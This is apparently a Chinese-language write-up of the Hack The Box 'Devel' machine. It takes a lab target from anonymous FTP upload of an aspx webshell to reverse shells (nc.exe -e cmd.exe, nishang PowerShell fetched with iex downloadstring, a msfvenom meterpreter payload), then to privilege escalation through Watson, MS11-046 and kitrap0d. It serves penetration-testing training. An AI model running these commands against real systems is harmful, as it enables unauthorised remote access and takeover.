HTB-Devel

目录扫描暴露有ftp (TCP 21) 和 http (TCP 80）

可以ftp匿名登入

看到一堆文件，包括一些反向shell，但也有一些与IIS服务相关，也可以get下载到本地

WEB

好像ftp里面有这个文件，尝试能不能访问别的文件

可以的，接下来的思路就是利用ftp上传木马

cmd.aspx

抓包的话会看到在http 响应中查看 burp，X-Powered-By: ASP.NET，可能需要一个 .aspx webshel​​

用 google 搜索 aspx webshel​​l（或者直接msfvenom生成一个，这样就直接msf监听，访问就可以反弹了）

这边利用https://github.com/danielmiessler/SecLists/blob/master/Web-Shells/FuzzDB/cmd.aspx

通过ftp上传

ftp> put cmd.aspx

可以访问http://10.10.10.5/cmd.aspx并得到一张表格：

nc.exe

cp /usr/share/windows-binaries/nc.exe smb/

smbserver.py share smb

在框框输入

\\10.10.14.14\share\nc.exe -e cmd.exe 10.10.14.14 443

nc监听

nishang

git clone https://github.com/samratashok/nishang.git

InvokePowerShellTcp.ps1副本/opt/nishang/Shells/。我将把它放在我的 smb 目录中（是用http的，不放也可以）

在文件底部添加

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 443

命令执行powershell iex(new-object net.webclient).downloadstring('http://10.10.14.14/Invoke-PowerShellTcp.ps1')

kali记得开启http服务

kali监听

msf

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=443 -f aspx > met_rev_443.aspx

ftp> put met_rev_443.aspx

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost tun0

set lport 443

options

run

访问

curl http://10.10.10.5/met_rev_443.aspx

提权

编译Watson

systeminfo

是window7

Watson是一种工具的 C# 实现，可快速识别本地 privesc 漏洞的缺失软件补丁 

 GitHub 页面下载 zip，然后双击Watson.sln我的 Windows VM 以在 Visual Studio 中将其打开。

我将转到 Visual Studio 菜单并打开Project -> Watson Properties。我将确保在左侧菜单中选择“应用程序”，并且我应该能够设置“Target framework”：

设置为 3.5，因为这是目标上安装的最新版本。

Build –> Configuration Manage

输出二进制文件设置架构（x86 与 x64）

systeminfo输出中记住它是 x64 处理器,但操作系统是 x86

将平台更改为 x86：

构建”->“构建 Watson”

放到kali的smb里面

靶机执行

\\10.10.14.14\share\Watson.exe

执行后会推荐我们提权模块

如果你是用msf的直接利用它的模块就可以扫描run post/multi/recon/local_exploit_suggester

利用ms11046

GitHub - abatchy17/WindowsExploits: Windows exploits, mostly precompiled. Not being updated. Check https://github.com/SecWiki/windows-kernel-exploits instead.

这里面有很多编译好的

将 exe 保存在我的 smb 共享中

\\10.10.14.14\share\MS11-046.exe

msf利用

use post/multi/recon/local_exploit_suggester

set session 1

options

run

有ms10_015

用这个再跑一下

use exploit/windows/local/ms10_015_kitrap0d

set session 1

msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost tun0

msf5 exploit(windows/local/ms10_015_kitrap0d) > set lport 445

run